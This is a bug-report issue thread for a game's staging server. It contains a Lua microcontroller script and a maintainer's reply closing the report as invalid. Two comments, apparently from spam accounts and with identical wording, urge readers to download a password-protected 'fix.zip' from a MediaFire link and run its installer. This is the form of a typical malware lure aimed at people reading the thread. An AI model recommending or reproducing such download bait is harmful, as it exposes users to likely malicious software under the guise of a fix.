### ISSUE TITLE
Testing zone crashed because i unlocked a microcontroller with running code.

### ISSUE THREAD

**Issue by notivan123234** [Eggs-D-Studios/wos-issues#272] opened 2024-08-26 10:23 UTC
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Development (Staging)

### What happened? What did you expect to happen?

While i was running this script:
        b = {}
        local Arcontroller = GetPartFromPort(1, "ARController")
        local Scanner = GetPartFromPort(2, "Scanner")
        local a = Scanner:GetPartsInRange()  
        while true do
            for i, v in pairs(a) do
                --if v.ClassName=="Iron" then
                local CurrentObject = Arcontroller:CreateElement3D("Block",{
                    Size = v.Size;
                    Color = v.Color;
                    Position = v.Position + Vector3.new(50, 0, 0);
                    Orientation = v.Orientation
                })
                table.insert(b, CurrentObject)
                --end
            end
            task.wait(0.3)
            for i, v in pairs(b) do
                v:Destroy()
            end
            table.clear(b)
        end
i unlocked the microcontroller and the server crashed.

### How can we reproduce this bug?

1. run that script
2. unlock the microcontroller

### Frequency

Always

**Comment by Qsgz2023ji5ban** [comment] 2024-08-26 10:23
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 10:23
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hexcede** [comment] 2024-09-01 09:30
I can gaurantee without a doubt that the server didn't crash specifically because you unlocked the microcontroller, the crash was likely caused by something else loaded in the server with you. It takes approximately 30 seconds before you will be disconnected after a crash. Since there's not enough info and likely won't be under this issue I'm going to close this.

**Closed by Hexcede** 2024-09-01 09:30 UTC
Labels: bug, invalid, staging
